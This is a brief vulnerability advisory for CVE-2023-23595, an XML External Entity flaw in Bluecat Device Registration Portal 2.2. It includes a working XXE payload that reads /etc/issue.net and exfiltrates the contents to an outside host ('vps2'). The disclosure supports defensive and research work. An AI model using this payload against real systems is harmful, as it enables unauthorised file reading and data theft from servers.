Bluecat device registration portal / Bluecat DRP version 2 is vulnerable to information leakage via XML External Entity Injection / XXE.
Tested on version 2.2. Version 2 is no longer supported by the vendor.
I was only able to extract single line files - /etc/issue.net for example. This appears to be a feature of Java 7 and above per https://web.archive.org/web/20230113185834/https://stackoverflow.com/questions/58395997/xxe-unable-to-retrieve-files-with-multiple-lines
I was also able to exfiltrate single line files via outbound FTP.
<!ENTITY % data SYSTEM "file:///etc/issue.net">
<!ENTITY % param1 "<!ENTITY extract SYSTEM 'http://vps2/?%data;'>">
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23595